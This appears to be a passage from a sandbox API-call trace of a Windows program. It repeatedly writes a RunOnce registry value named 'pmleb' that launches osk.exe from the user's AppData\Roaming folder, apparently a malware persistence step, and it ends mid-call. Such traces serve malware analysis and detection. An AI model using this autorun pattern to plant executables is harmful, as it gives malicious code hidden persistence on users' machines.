[0093.700] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.700] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.700] SetTimer (hWnd=0x20280, nIDEvent=0x2246, uElapse=0xa, lpTimerFunc=0x0) returned 0x2246 [0093.701] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.715] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.715] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.715] KillTimer (hWnd=0x20280, uIDEvent=0x2246) returned 1 [0093.715] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.716] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.716] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.716] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.716] RegCloseKey (hKey=0x280) returned 0x0 [0093.716] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.716] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.716] SetTimer (hWnd=0x20280, nIDEvent=0x2247, uElapse=0xa, lpTimerFunc=0x0) returned 0x2247 [0093.716] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.730] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.730] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.730] KillTimer (hWnd=0x20280, uIDEvent=0x2247) returned 1 [0093.731] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.731] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.731] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.731] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.731] RegCloseKey (hKey=0x280) returned 0x0 [0093.731] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.732] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.732] SetTimer (hWnd=0x20280, nIDEvent=0x2248, uElapse=0xa, lpTimerFunc=0x0) returned 0x2248 [0093.732] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.747] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.747] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.747] KillTimer (hWnd=0x20280, uIDEvent=0x2248) returned 1 [0093.747] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.748] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.748] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.748] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.748] RegCloseKey (hKey=0x280) returned 0x0 [0093.748] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.748] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.748] SetTimer (hWnd=0x20280, nIDEvent=0x2249, uElapse=0xa, lpTimerFunc=0x0) returned 0x2249 [0093.748] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.762] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.762] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.762] KillTimer (hWnd=0x20280, uIDEvent=0x2249) returned 1 [0093.763] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.763] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.763] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.763] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.764] RegCloseKey (hKey=0x280) returned 0x0 [0093.764] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.764] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.764] SetTimer (hWnd=0x20280, nIDEvent=0x224a, uElapse=0xa, lpTimerFunc=0x0) returned 0x224a [0093.764] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.777] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.777] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.777] KillTimer (hWnd=0x20280, uIDEvent=0x224a) returned 1 [0093.778] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.778] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.778] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.778] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.779] RegCloseKey (hKey=0x280) returned 0x0 [0093.779] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.779] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.779] SetTimer (hWnd=0x20280, nIDEvent=0x224b, uElapse=0xa, lpTimerFunc=0x0) returned 0x224b [0093.779] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.375] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.375] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.375] KillTimer (hWnd=0x20280, uIDEvent=0x224b) returned 1 [0094.375] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.376] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.376] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.376] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.376] RegCloseKey (hKey=0x280) returned 0x0 [0094.376] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.376] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0094.377] SetTimer (hWnd=0x20280, nIDEvent=0x224c, uElapse=0xa, lpTimerFunc=0x0) returned 0x224c [0094.377] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.387] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.387] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.387] KillTimer (hWnd=0x20280, uIDEvent=0x224c) returned 1 [0094.388] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.388] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.388] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.388] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.388] RegCloseKey (hKey=0x280) returned 0x0 [0094.389] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.389] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.389] SetTimer (hWnd=0x20280, nIDEvent=0x224d, uElapse=0xa, lpTimerFunc=0x0) returned 0x224d [0094.389] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.404] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.404] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.404] KillTimer (hWnd=0x20280, uIDEvent=0x224d) returned 1 [0094.404] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.405] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.405] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.405] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.405] RegCloseKey (hKey=0x280) returned 0x0 [0094.405] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.405] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.405] SetTimer (hWnd=0x20280, nIDEvent=0x224e, uElapse=0xa, lpTimerFunc=0x0) returned 0x224e [0094.406] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.417] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.417] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.418] KillTimer (hWnd=0x20280, uIDEvent=0x224e) returned 1 [0094.418] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.418] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.418] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.418] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.419] RegCloseKey (hKey=0x280) returned 0x0 [0094.419] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.419] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.419] SetTimer (hWnd=0x20280, nIDEvent=0x224f, uElapse=0xa, lpTimerFunc=0x0) returned 0x224f 
[0094.419] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.433] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.433] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.433] KillTimer (hWnd=0x20280, uIDEvent=0x224f) returned 1 [0094.434] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.434] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.434] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.434] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.435] RegCloseKey (hKey=0x280) returned 0x0 [0094.435] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.435] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.435] SetTimer (hWnd=0x20280, nIDEvent=0x2250, uElapse=0xa, lpTimerFunc=0x0) returned 0x2250 [0094.435] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.448] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.448] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.448] KillTimer (hWnd=0x20280, uIDEvent=0x2250) returned 1 [0094.449] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.449] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.449] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.449] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.449] RegCloseKey (hKey=0x280) returned 0x0 [0094.449] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.450] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.450] SetTimer (hWnd=0x20280, nIDEvent=0x2251, uElapse=0xa, lpTimerFunc=0x0) returned 0x2251 [0094.450] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.464] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.464] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.464] KillTimer (hWnd=0x20280, uIDEvent=0x2251) returned 1 [0094.464] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.465] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.465] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.465] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.465] RegCloseKey (hKey=0x280) returned 0x0 [0094.465] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.465] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.465] SetTimer (hWnd=0x20280, nIDEvent=0x2252, uElapse=0xa, lpTimerFunc=0x0) returned 0x2252 [0094.465] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0094.480] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.480] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.480] KillTimer (hWnd=0x20280, uIDEvent=0x2252) returned 1 [0094.480] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.481] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.481] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.481] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.481] RegCloseKey (hKey=0x280) returned 0x0 [0094.481] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.481] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.481] SetTimer (hWnd=0x20280, nIDEvent=0x2253, uElapse=0xa, lpTimerFunc=0x0) returned 0x2253 [0094.481] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.495] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.495] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.495] KillTimer (hWnd=0x20280, uIDEvent=0x2253) returned 1 [0094.495] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.496] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.496] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.496] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.496] RegCloseKey (hKey=0x280) returned 0x0 [0094.496] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.496] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.497] SetTimer (hWnd=0x20280, nIDEvent=0x2254, uElapse=0xa, lpTimerFunc=0x0) returned 0x2254 [0094.497] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.510] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.510] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.511] KillTimer (hWnd=0x20280, uIDEvent=0x2254) returned 1 [0094.511] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.511] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.511] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.511] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.512] RegCloseKey (hKey=0x280) returned 0x0 [0094.512] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.512] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.512] SetTimer (hWnd=0x20280, nIDEvent=0x2255, uElapse=0xa, lpTimerFunc=0x0) returned 0x2255 [0094.512] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.526] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.526] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.527] KillTimer (hWnd=0x20280, uIDEvent=0x2255) returned 1 [0094.527] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.527] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.527] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.528] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.528] RegCloseKey (hKey=0x280) returned 0x0 [0094.528] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.528] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.528] SetTimer (hWnd=0x20280, nIDEvent=0x2256, uElapse=0xa, lpTimerFunc=0x0) returned 0x2256 [0094.528] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.542] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.542] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.542] KillTimer (hWnd=0x20280, uIDEvent=0x2256) returned 1 [0094.542] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.543] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.543] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.543] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.543] RegCloseKey (hKey=0x280) returned 0x0 [0094.543] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.543] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.543] SetTimer (hWnd=0x20280, nIDEvent=0x2257, uElapse=0xa, lpTimerFunc=0x0) returned 0x2257 [0094.544] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.557] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.558] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.558] KillTimer (hWnd=0x20280, uIDEvent=0x2257) returned 1 [0094.558] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.558] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.558] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.559] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.559] RegCloseKey (hKey=0x280) returned 0x0 [0094.559] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.559] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.559] SetTimer (hWnd=0x20280, nIDEvent=0x2258, uElapse=0xa, lpTimerFunc=0x0) returned 0x2258 [0094.559] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.573] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.573] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.573] KillTimer (hWnd=0x20280, 
